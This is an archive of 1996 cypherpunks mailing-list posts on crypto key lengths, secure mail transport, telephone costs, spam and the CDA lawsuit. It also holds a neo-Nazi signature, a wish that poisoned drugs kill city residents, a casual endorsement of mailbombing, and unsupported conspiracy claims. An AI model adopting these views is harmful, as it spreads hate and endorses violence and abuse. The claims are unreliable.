Subject: Re: Canada Imprisons People For Human Rights Activity
In-Reply-To: <Pine.GUL.3.95.960820090807.8262A-100000@Networking.Stanford.EDU>
Message-ID: <199608210012.RAA11460@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


ON
> 
> On Tue, 20 Aug 1996, James A. Donald wrote:
> 
> > At 03:18 PM 8/19/96 -0700, Rich Graves wrote:
> > > You know, Amnesty
> > > has some outstanding policies regarding accuracy, objectivity, and
> > > universality.
> > 
> > Such as their policy that disappearances in Cuba are only mentioned in 
> > a vague and euphemistic way somewhere in the fine print of the middle
> > of their Cuban reports, whereas similar disappearances are shouted from
> > the rooftops when they happen in right wing South American dictatorships?
> 
> In a word, no. I wasn't talking about their policy to oppress the Easter
> Bunny, either. 
> 
> I meant their policy of not taking sides, which in Latin America has often
> meant that they have less of a left-wing bias than Human Rights Watch. They
> do not describe people with loaded terms like "pro-democracy," "worker's
> rights advocate," "freedom fighter," or "social justice activist." They say
> "this person is in prison for political reasons," and leave it at that.
> Usually, they don't even identify the reasons -- just the abuse of state
> power.
> 
> I've always favored a carefully tailored formalistic approach to human
> rights and free speech issues, without taking sides on the underlying issues
> of political controversy. Amnesty and the ACLU generally follow this
> approach. When they have deviated from that approach to make sweeping
> statements not tied to *individual* human rights, as Amnesty's general
> opposition to apartheid and the ACLU's guarded support for majority-minority
> gerrymandering, I have opposed them.
> 
> Happily, most of the time, they stay above the fray, which I believe is the
> only appropriate role for a "human rights organization." I have no objection
> to anti-communist, anti-fascist, or whatever organizations, but I don't
> think they should bill themselves as human rights organizations. The
> Wiesenthal Center to be a "human rights organization"; it's an anti-fascist
> organization, which does some good, some bad, but always focused on one
> issue. Human Rights Watch didn't start out as a "human rights organization"; 
> it started out as an anti-communist organization. They have since broadened
> their scope and international coverage considerably, but their history of
> making substantitive statements on larger political questions remains.
> Ironically, now they tend to show a leftist bias.

Liar, you support imprisoning and deporting people based purely on their 
political ideas, such as the bile your mouth puked up all over the net this
whole year.  Re: Ernst Zndel and his years of imprisonment by a court 
for merely expressing his racist ideas, racist political ideas being 
strictly illegal in Canada, hell everywhere in the so called white world 
except for the USA, so far.


--
National socialism is the opposite of everything today.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Elliot Lee <sopwith@redhat.com>
Date: Wed, 21 Aug 1996 09:01:17 +0800
To: C Matthew Curtin <cmcurtin@research.megasoft.com>
Subject: Re: Securing Internet mail at the MTA level
In-Reply-To: <199608201529.LAA01469@goffette.research.megasoft.com>
Message-ID: <Pine.LNX.3.95.960820170631.8463B-100000@dilbert.redhat.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, C Matthew Curtin wrote:

> Recently, I've been looking into securing email at the MTA level, and

> Two types of approaches are possible:
>     1. Adding to the SMTP protocol itself, allowing for MTAs to
>        identify crypto-capable peers, and then performing
>        authentication and session encryption where possible.
>     2. Waiting for a cryptographic transport layer network protocol
>        (such as what is being proposed in draft-ietf-tls-ssh-00),
>        allowing SMTP to remain untouched, and only requiring MTAs to
>        add support for the new network protocol.
> 
> I like the second approach better, because it allows more problems to
> be solved with one move, and it would be easier to add crypto

> I mentioned my interest in an SSH-capable MTA to Tatu Ylonen

> My questions are:
>     1. Which of the two approaches seems to make the most sense to
>        you?

I think something like the first one would be a little bit better. In my
mind I see something similar to the "ESMTP" message appearing on
connection to the mail daemon - "SSLESMTP" if you will. Then client could
issue a "ENCD SSL" command (or whatever) and it would go crypto. I already
have used telnet and FTP clients that does something similar to this, and
they work almost transparently....

>     2. Is there another approach that could work better?
>     3. Is there interest in adding SSH functionality to sendmail in
>        the near future (either by the draft spec, or once the RFC has
>        been published)?

Have you looked at SSL? It allows different algorithms to be used, etc.
etc. (although the certificate & key distribution method uses x509, which
may be a pain...?). The SSLeay library is a freely available
implementation of SSLv2.

Just MHO,

 --==== Elliot Lee = <sopwith@redhat.com> == Red Hat Software ====--
"Usenet is like a herd of performing elephants with diarrhea; massive,
 difficult to redirect, awe-inspiring, entertaining, and a source of
 mind-boggling amounts of excrement when you least expect it."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 21 Aug 1996 08:28:59 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <Pine.GUL.3.95.960820100659.8541A-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SOL.3.91.960820170146.11886A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 20 Aug 1996, Rich Graves wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Tue, 20 Aug 1996, Brad Dolan wrote:
> 
> > Roger Morris has documented the base story nicely, first in an article 
> > intended for the Washington Post (but which wound up in Penthouse when the 
> > Post got cold feet) and now in a book, _Partners in Power_.
> 
> You're joking, right? I must admit that the irony of a story fabricated by
> the far left being used against the left by the far right is delicious. 
> 
> Just in case you're serious, if you liked Partners in Power, you'll love
> this... 
> 
> - -rich
> 
>              Gary Hart, George Bush, and Michael Williams [...]

Goofy guy agrees with Morris about X, therefore Morris' well-documented 
claims about X and Y are false?

Maybe I should have cited R. Emmett Tyrell's _Boy Clinton_?  ;-)

It also rained cocaine in Tennessee in the '80s, 
but the authorities never seemed to notice.  Ask the Knoxville 
_News-Sentinel_ how many stories it can find in its archives relating 
to planes loaded with cocaine crash-landing on remote airstrips, 
airdrops being found in citizens' yards, etc.  Then ask the DEA what it did 
about those events.

bd

p.s. Donna Rice has lately been running point for a regulate-the-internet 
front group.  I wouldn't put anything past her.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu>
Date: Wed, 21 Aug 1996 14:29:15 +0800
To: eagle@eff.org
Subject: Re: Key Length Correlation
In-Reply-To: <9608201302.aa18129@deepthought.armory.com>
Message-ID: <321a391f26cd002@noc.tc.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Davis said:
> I've read Blaze and diffie's paper on Semetric Key Length.  I'm currious
> how semetric key length correlates to public key cryptography length.  Does
> public key length have to be much longer, (assuming the algorithms are strong),
> to provide the same level of security as a shorter semetric key?  TIA   
> -- 

It's been calculated that in the case of PGP, to equal the work factor 
to brute force the 128 bit IDEA key would require a RSA key > 3000 bits.

Someone probably has a reference.

-- 
Kevin L. Prigge                     | "I rarely saw people sitting at
Systems Software Programmer         |  computers producing real code
Internet Enterprise - OIT           |  wearing ties." - Philippe Kahn
University of Minnesota             | (speech at Software Development '90)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Cobb <stephen@iu.net>
Date: Wed, 21 Aug 1996 08:50:46 +0800
To: cmcurtin@research.megasoft.com
Subject: Re: Securing Internet mail at the MTA level
Message-ID: <1.5.4.32.19960820214340.005d0b98@iu.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 AM 8/20/96 -0400, you wrote:
>
>Hi,
>
>Recently, I've been looking into securing email at the MTA level, and
>would like to get your thoughts on implementation possibilities and
>related issues.
>
>The problems that I'm trying to solve are:
>    1. Host authentication
>    2. Data privacy
>
Hmmm, have you thought about how this might fit/mesh/work with the security
mechanisms in IPv6? Just a thought...Stephen







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 21 Aug 1996 14:53:41 +0800
To: vipul@pobox.com
Subject: Re: Phoneco vs X-Phone
Message-ID: <199608210046.RAA01785@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:02 AM 8/21/96 +0000, Vipul Ved Prakash wrote:

>Now lets see, you say we have enough capacity out there, alright, but then
>why is everyone raving about "a slow internet". We all know in IT 640K
>is never enough, niether is 640Mb. At some point in time, new cables
>_have_ to be laid. Moreover you seem to be considering a static growth rate,
>but we all know the Internet is nothing short of a big-bang. 
>
>I am trying to debate a model rather than numbers and in which case its
>important to to consider a long-term scenario.

Well, okay, here's some numbers: First, I've recently found out that in 
large quantities, it costs 10 cents per meter for bare fiber.

Assume 30 cents per meter per fiber for cabled fiber, or about $10 (US) per 
meter for 36-fiber cable.  Each fiber pair should be able to handle 
approximately 1 million conversations at current data rates, or a total of 
18 million conversations for that 18-pair cable, or 9.5 trillion 
conversation-minutes.

Multiply this cost by 10 for right of way, trenching, repeaters, and other 
auxiliary hardware, or $100 per meter.  This is probably just a ballpark 
estimate, but...

Let's assume that the average phone call goes through 5000 kilometers of 
fiber, which is approximately the width of the US.  (yes, I realize this is 
vastly over-inflated.  But my estimate is attempting to be conservative, on 
the "safe" side.)  A cable the width of the US costs  $500 million.  Assume 
that if it is to pay for itself, it must provide gross revenue of at least 
this amount to make a profit.

(It would probably be more accurate to say that the cable needs to actually 
profit by 10% of its value per year.  If it grossed 100% of its value, per 
year, then that would provide up to $450 million per year  in maintenance 
and other costs per year, and still be a profit of 10%.  But again, I'm 
trying to be CONSERVATIVE in how I account for costs.)

Assume an average of 1/10th of its capacity is used, or 950 billion 
conversation-minutes.  Do the division, dividing $500 million by 95 billion, 
and this works out to 1/20 of a penny per conversation-minute.

At this point, your jaw should drop.  Despite my dramatically over-inflated 
cost estimates for the fiber and installation and maintenance, and vastly 
underestimated utilization, I've still managed to justify only 1/20 penny 
per minute of cost. 


>This reminds me of a survey on a "proposed Rural Telecom Network" back in 
>India, which finally decided that ROI will not justify the project
>even in 20 years time.

I've read that estimates show that it would probably be cheaper to provide 
cellular-telephone service in China to everyone than to wire the country up 
with copper lines.  This isn't particularly surprising.  Cell-phones solve 
the "last few hundred yards/mile or two" problem quite well.  Since nearly 
all of the actual connections in a copperline telephone system are 
switch-to-individual-phone lines, going cellular saves a bundle of 
installation costs.
 

>> In the US, the current telephone company infrastructure is ALREADY PAID 
FOR. 
>>  It was paid for by over-inflated rates during a monopolized era.   If 
>> anything, the locals have an "unfair advantage" over the rest of the 
>> companies:  Only they have a copper pair into every home.  
>
>Alright, once again I try to show what exactly I am pointing at. Alice uses
>the phone 23 hrs a day, Bob uses 10 mins, both get their connections
>from ABCTel. The bandwidth with ABCTel saturates and it has to buy more 
>bandwidth (if ABCTel is a babybel, it will be buying it from a BigBell,
>and whether or not bandwidth exists is quite besides the point here)
>Its because of subscribers like Alice ABCTel is buying more bandwidth,
>and the flat rate revenues generated by addition of a couple of members won't 
>justify the new bandwidth. 


>Flat rates are based on the assumption that a subscriber will use the service
>for X amount of time. Since the phoneco has no control over user behaviour,
>more that reasonable number of Alice-type clients will screw up the phonecos 
>economics.

 Re-read my estimate, above.  Apparently, POTS-level "bandwidth" in a 
national fiber network should "cost" about 1/20 cent per minute, or maybe 
even less than that.  Your commentary just above shows that you are assuming 
a far greater cost.   For example, even your "23-hours-per-day" exaggeration 
should only cost 23x60x$0.0005, or $0.69 per day, or $21 per month.  High, 
but that usage is unrealistic, of course.  However, assuming one eighth of 
this usage, or 3 hours per day, that would be a daily cost of approximately 
$0.08, or about $2.75 per month.

Also, you need to remember that if the telephone usage (in for example, the 
US) was so high as to get a substantial fraction of the population on the 
phone, LD, for as long as 12 hours per day, the average utilization of the 
fiber cable I've projected would rise from the highly-conservative figure of 
10%, up to perhaps  25% or so.  Since this increased usage wouldn't increase 
the cost of the cable itself or the installation or maintenance, the 
corresponding cost estimate would drop from 0.0005 dollars per minute to 40% 
 of this or so, which is about $0.0002 per minute.  At that rate, a "12 
hours per day" usage would cost only $4.32 per month, which is well in line 
with current phone plans.

But again, remember that most of these "costs" are really merely the result 
of allocating some proportion of an existing, fixed cost.  Make that cost 
small enough (as fiber optics does) and spread it over enough users, and it 
becomes ignorable.


>With explosion of Internet, people have found a new way of using their phone
>line, and all these companies are already in trouble. To top all that we
>are loudly professing the Internet (ultra-low-cost) solutions to LD Calls
>with phoneco. 

I don't see any problem at all!  You're just (falsely) assuming that LD 
should, somehow, be more expensive than local calls.  Maybe it should be 
VERY SLIGHTLY more expensive,  but LD fiber is basically a one-time 
investment  with little maintenance costs.  

In order to determine how much more expensive LD should be over local, all 
you should have to do is figure out how much the additional equipment and 
fiber costs, and then consult an telephone engineer to figure out usage 
rates, and then go to an economist who can tell you how many more dollars 
you're going to have to charge.  (Based on typical ROI tables,etc.)   I've 
done enough of the numbers already to convince me that the amount is so tiny 
as to be ignorable.  


The fact is, LD phone is a business that, like it or not, is going to shrink 
drastically _in_terms_of_dollars_, simply because the cost of that service 
will likewise, go down.  That's life.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Wed, 21 Aug 1996 14:01:53 +0800
To: jim@ACM.ORG
Subject: Re: Spamming (Good or Bad?)
Message-ID: <199608210044.RAA02892@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About 20 Aug 96, 16:23, Jim Gillogly wrote:
> 
> Vipul Ved Prakash <vipul@pobox.com> writes:
> >I don't know if there has been much discussion on the ethics of
> >spamming here? Is spamming free speech? 
> 

> I oppose spamming because it's rude and inefficient, lowering the
> S/N everywhere it happens.  Market droids

Market Droids????  As a salesman I take offence at this slur.

> favor it because it's
> cheap, and no matter how many people they piss off bigtime, they
> make some sales.

Even make sales to people who are pissed off at first...

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 21 Aug 1996 13:26:03 +0800
To: cypherpunks@toad.com
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <Pine.SOL.3.91.960820170146.11886A-100000@use.usit.net>
Message-ID: <Pine.GUL.3.95.960820174341.11228F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Brad Dolan wrote:

> Goofy guy agrees with Morris about X, therefore Morris' well-documented 
> claims about X and Y are false? 

Lots of footnotes to "confidential interview" do not make a valid study. How
many "well-documented" studies of the Kennedy assassination and UFO
sightings have you read? 

I followed this wild goose chase to exhaustion back in 1986-7. I've
forgotten most of it, but I'm sure I have some notes and maybe some tapes
lying around. Yes, some contras and some sandinistas and some martistas and
*lots* of the senderos and M-19 ran drugs. That's what happens when you
criminalize a political movement -- political figures become criminals in
order to survive. (When the crime they're involved is simply free trade in
criminalized agricultural products, it just adds another layer of irony.)

There's a kernel of truth and plausibility to most conspiracy theories,
including this one. (It's a big mistake to say *all* conspiracy theories.) 
However, the money involved was rather small, the process was basically skew
to politics (both sides did it all), and I have never been convinced that
the CIA -- or even North's coterie in the NSC, which as you know ran a
number of ops that the CIA would never have gone for -- was in on it. 

(ObConspiracy: H. Ross Perot actually was involved in funneling money to the
contras. He was rather open and proud of it. Is he mentioned in Morris's
book?)

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Skip)
Date: Wed, 21 Aug 1996 12:43:06 +0800
To: cypherpunks@toad.com
Subject: Re: License Plates
Message-ID: <199608210102.SAA22053@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


One method of protest against License Plate invasion of privacy is to 
simply not use license plates.  When I bought my car six years ago the 
front license plate was never drilled for license plate holes, so I 
simply took off the rear plate too, and in six months I only got two 
tickets for it, one for twenty dollars in Walnut Creek which I only had 
to pay, not needing to "fix the defect," and another on the Richmond 
Bridge, costing seventy six dollars because it was a fix it ticket which 
I didn't want to fix, and pulled over another time with only a warning.  
Not bad at all for California, has any one else practised this form of 
protest?  I had to put the rear plate back on though, because I acquired 
a drinking problem and I didn't want to get busted for drunk driving.
Now that I'm sober, and with worse threats concerning license plates, 
it's time to pull off that rear plate again!  Doing it tonight, join me!


--
Skip, OBC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Wed, 21 Aug 1996 13:05:31 +0800
To: Vipul Ved Prakash <vipul@pobox.com>
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <199608210407.EAA00568@fountainhead.net>
Message-ID: <Pine.GUL.3.95.960820180602.11228H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Aug 1996, Vipul Ved Prakash wrote:

> I don't know if there has been much discussion on the ethics of spamming
> here? Is spamming free speech? 

Yes.

So is mailbombing the motherfucker, or more productively, virtually
picketing his ISP until they kick him off for net abuse.

Ethically? We don't talk ethics much here, but I'd say it's highly unethical
to abuse a service paid for by the pooled resources of many. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Skip)
Date: Wed, 21 Aug 1996 12:25:24 +0800
To: cypherpunks@toad.com
Subject: PreRFD: comp.org.cypherpunks
Message-ID: <199608210110.SAA24006@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The Subject: line says it all.

My suggestion number #1:

No moderation.


--
Skip, OBC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Wed, 21 Aug 1996 11:44:49 +0800
To: willday@rom.oit.gatech.edu
Subject: Re: Hackers invade DOJ web site
Message-ID: <199608202331.SAA25854@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


[...]
Will Day (willday@rom.oit.gatech.edu) wrote:
>I understand how it affects their claim for the security of escrowed
>keys, but I'm afraid I don't follow the other argument.  How would the
>wide availability of strong encryption have helped prevent the breakin?
>How would encryption in general prevent breakins?  I'd love to use this
>as an argument for strong encryption, but I don't see how it really
>applies.

Since we don't know how the intruders broke in, we can only speculate.  I
can think of several scenarios where cryptographic techniques could help.
I can also think of several where they wouldn't.  When you've only got 20
seconds to explain to a non-technical audience, I don't think it's dishonest
to say that it might have prevented it.

Off the top of my head, here are a couple examples:

   1. It's possible that a DOJ employee logged in from a remote site while
      the intruders were snooping somewhere along the way.  If the link had
      been encrypted, that would have made things much more difficult or
      impossible for the attackers.

   2. Perhpas the intruders used IP spoofing and .rhosts to break in.  If
      machines had to be cryptographically authenticated, a rsh from the
      wrong machine wouldn't work.

I think my 20 seconds are up.  :>

                          | (Douglas) Hofstadter's Law:
                          | It always takes longer than you expect, even 
Frank Stuart              | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Wed, 21 Aug 1996 09:26:39 +0800
To: cypherpunks@toad.com
Subject: cryptoanalysis 002
Message-ID: <960820183644_506047835@emout17.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I agree on expanding the symbols to represent the alphabet.

For example, if the crypto-alphabet for e is 23, 45, 190, 200, etc, one can
remove some of the frequency for a letter.  This definately makes it harder
to attack with the frequency analysis method because the "resolution" of the
distribution for the letter is lessened to a near randomness.  (So it looks,
there are still clues, eh?)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Wed, 21 Aug 1996 09:07:23 +0800
To: cypherpunks@toad.com
Subject: Husband/Wife jailed for saying Clinton Sucks
Message-ID: <960820183645_506047852@emout10.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Rush Limbaugh reports:

That a husband and wife are being jailed for yelling to Clinton "You Suck".

The Secret Service states additional words (yet un-uttered to the rest of us)
were mentioned that they deemed threatening.

Ahhh, good to live in a free country....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 21 Aug 1996 10:40:04 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: "Utilization Review"
In-Reply-To: <199608200618.XAA18824@netcom8.netcom.com>
Message-ID: <Pine.SV4.3.91.960820185545.9214C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


We _had_  economic cryptoanarchy several centuries ago, with respect to 
unpredictable, but expected risks in merchant shipping.

A bunch of them thar crypro-anarchists were the ones who invented modern 
insurance, in the manifestation of Lloyds of London.

If you want to convince the masses - or even fashion elites such as myself
- to forego recourse to voluntary risk sharing.... you have your work cut
out for you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 21 Aug 1996 09:38:39 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <Pine.GUL.3.95.960820012724.5850C-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SV4.3.91.960820191108.9214E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I wish they'd get back in the business, but add an overt poison to the 
product.

Clean out the shit from the cities. Long live Darwinism.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 21 Aug 1996 10:32:40 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: CS First Boston lawsuit
In-Reply-To: <2.2.32.19960820101053.0069d994@mail.io.com>
Message-ID: <Pine.SV4.3.91.960820192122.9214F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Parties can also conceal their identity, by leave of the court. As in the 
notorious, Roe v. Wade
           ~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 21 Aug 1996 12:59:34 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: "Utilization Review"
Message-ID: <199608210220.TAA19927@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:01 PM 8/20/96 -0400, Alan Horowitz wrote:
>If you want to convince the masses - or even fashion elites such as myself
>- to forego recourse to voluntary risk sharing.... you have your work cut
>out for you.

The insurance companies have every reason to perform "Utilization Reviews",
since only they have incentive to contain costs.  Our medical plans tend to
insure for routine medical care and as a result, give the insurance
companies the data about our routine care.  If they only paid for
catastrophic illness and accident care, they would only have reason to have
data on that care.

Do you want to share the risk of routine medical care?  Or do you just want
to share the risk of catastrophic illnesses and accidents?  Or do you want
to keep it all private.  What you pay for, you can keep private.  What they
pay for, they can review.  Your choice.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 21 Aug 1996 11:15:50 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: CS First Boston lawsuit
In-Reply-To: <Pine.SUN.3.94.960820121113.10677A-100000@polaris>
Message-ID: <Pine.SV4.3.91.960820193116.9214I-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Federal seizures are published before the levy is finalized, so that 
lien-holders can assert their interest.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 21 Aug 1996 11:05:14 +0800
To: Stephen Cobb <stephen@iu.net>
Subject: Re: US Taxes on X-Pats (getting off topic)
In-Reply-To: <1.5.4.32.19960820173846.007137e4@iu.net>
Message-ID: <Pine.SV4.3.91.960820193307.9214J-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


You miss the point. The FICA never WAS a "social security tax". There 
never WAS any "entitlement".

THeir return on paying FICA is that the INS is funded to deport them if 
they go out of status. And good riddance.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 21 Aug 1996 10:58:01 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
In-Reply-To: <Pine.GUL.3.95.960820100659.8541A-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SV4.3.91.960820194013.9214K-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Yes, oh, I'm breathing hard now.


The majorityh of the nation wanted President Hart.

And that poor decent man was _raped_ by the bimbo. He didn't want to do 
it with her, but she forcibly made him do it.

Oh my God.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 21 Aug 1996 13:34:22 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Airport legal question
Message-ID: <Pine.3.89.9608201919.A23972-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


I know that it is a violation of federal law to joke about explosives at 
the X-ray machine. Would an "I love Explosives" sticker on carry-on 
luggage violate any laws?

TIA,







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 21 Aug 1996 11:39:57 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: CS First Boston lawsuit
In-Reply-To: <Pine.SV4.3.91.960820193116.9214I-100000@larry.infi.net>
Message-ID: <Pine.SUN.3.94.960820200540.6803A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996, Alan Horowitz wrote:

> Federal seizures are published before the levy is finalized, so that 
> lien-holders can assert their interest.

The publication alone is not sufficent to constitute notice however.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 21 Aug 1996 13:49:57 +0800
To: cypherpunks@toad.com
Subject: Justice Department stalls for time in CDA lawsuit, from HotWired
Message-ID: <Pine.SUN.3.91.960820201723.15023D-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Tue, 20 Aug 1996 20:12:42 -0700 (PDT)
From: Declan McCullagh <declan@eff.org>
To: fight-censorship@vorlon.mit.edu
Subject: Justice Department stalls for time in CDA lawsuit, from HotWired

[Read the complete column at the URL below... -Declan]


http://www.hotwired.com/netizen/

HotWired, The Netizen
21 August 1996

DOJ Dodge

by Declan McCullagh (declan@well.com)
Washington, DC, 20 August
  
   The US Department of Justice is stalling for time.

   The Supreme Court yesterday granted the government an extra month to
   submit the next phase of its Communications Decency Act appeal,
   allowing the DOJ a few more weeks to coordinate the original ACLU
   lawsuit with a lesser-known suit filed by Joe Shea, editor of the
   American Reporter.

[...]   
   
   But in truth, the DOJ shouldn't need any more time to file this
   paperwork. The "jurisdictional statement" the department's been
   working on for seven weeks - and now has until 29 September to submit
   - must argue only that there's a substantial constitutional issue at
   stake in the CDA lawsuit, something transcendently obvious to anyone
   who hasn't been napping through the 14 months since Time magazine's
   cyberporn cover hit the newsstands.
   
[...]

   While this is likely just normal legal skirmishing in a battle where
   the DOJ attorneys have few useful weapons and already have suffered
   one crushing defeat, the government's five-page application for an
   extension of time hints at why a delay would be to their advantage.
   
[...]   

   In other words, the CDA might be unconstitutional now, but
   _constitutional_ some months from now - depending on how labelling and
   blocking technologies such as PICS and SurfWatch evolve. Keeping kids
   out might have been a royal pain when the judges heard the case in
   March 1996, but by March 1997 it might amount to no more than the
   minor irritation of a constitutional hangnail.
   
   David Sobel, a lawyer for the Electronic Privacy Information Center
   and co-counsel on this case, said: "They could make the argument in
   the Supreme Court that the court in Philadelphia hasn't really
   completed its work on the case, and all that is entered is a
   preliminary injunction. They could argue that this case should go back
   to Philadelphia for further proceedings, since they're now prepared to
   answer the court's questions about what kind of technology may be
   coming down the pike."
   
   Whatever the reason for the DOJ's delay - summer bureaucratic
   slothfulness or malicious conniving - one thing is certain: we have
   the rest of the year to enjoy the government's lawyer tricks.
   
###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Wed, 21 Aug 1996 13:50:36 +0800
To: qut@netcom.com (Skip)
Subject: Re: License Plates
Message-ID: <199608210316.UAA05855@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About 20 Aug 96, 18:02, Skip wrote:

> and with worse threats concerning license plates, it's time to pull
> off that rear plate again!  Doing it tonight, join me!


ALL RIGHT Skip!!!
Personal protest is the way to go.

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Wed, 21 Aug 1996 13:53:13 +0800
To: Scottauge@aol.com
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <960820183645_506047852@emout10.mail.aol.com>
Message-ID: <Pine.3.89.9608202046.A25476-0100000@netcom8>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Aug 1996 Scottauge@aol.com wrote:

> Rush Limbaugh reports:
> 
> That a husband and wife are being jailed for yelling to Clinton "You Suck".
> 
> The Secret Service states additional words (yet un-uttered to the rest of us)
> were mentioned that they deemed threatening.
> 
> Ahhh, good to live in a free country....
> 
A more detailed version of this story was posted on talk.politics.guns 
last week.  I could dig it up and post it if anyones interested.


---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: morgan@keilin.helsinki.fi (Joel Morgan)
Date: Wed, 21 Aug 1996 05:27:21 +0800
To: cypherpunks@toad.com
Subject: [NOISE] other distributed searches
Message-ID: <199608201726.UAA23102@keilin.helsinki.fi>
MIME-Version: 1.0
Content-Type: text/plain


Two distributed searches on the net are described in Science (9 August
1996 p. 743).

One is a search for "Mersenne" prime numbers: 
